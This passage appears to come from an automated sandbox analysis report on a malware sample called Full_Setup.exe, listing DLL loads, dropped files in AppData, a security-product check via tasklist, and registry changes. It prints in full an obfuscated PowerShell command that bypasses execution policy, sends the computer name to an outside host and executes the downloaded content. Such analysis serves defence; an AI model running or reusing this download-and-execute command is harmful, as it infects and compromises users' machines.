Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: twinui.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: shdocvw.dll

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Full_Setup.exe

Static file information: File size 75917732 > 1048576

Source:	Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2549522831.0000000038680000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2528035200.0000000003635000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2549522831.0000000038680000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2528035200.0000000003635000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z			Jump to behavior

Source: 8R65FTCZQK06W5IFC.tmp.8.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29
Source: 8R65FTCZQK06W5IFC.exe.0.dr	Static PE information: real checksum: 0x9307ce should be: 0x8615ed
Source: 8R65FTCZQK06W5IFC.tmp.6.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29

Source: 8R65FTCZQK06W5IFC.exe.0.dr	Static PE information: section name: .didata
Source: 8R65FTCZQK06W5IFC.tmp.6.dr	Static PE information: section name: .didata
Source: 8R65FTCZQK06W5IFC.tmp.8.dr	Static PE information: section name: .didata

Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_0367CB54 push eax; retf	0_3_0367CB55
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_00909502 push eax; ret	0_3_00909531
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_00909502 push eax; ret	0_3_00909531
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_008AA2AA push esp; iretd	0_3_008AA32B
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_00909502 push eax; ret	0_3_00909531

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	File created: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-IOQ9H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	File created: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Full_Setup.exe	File created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
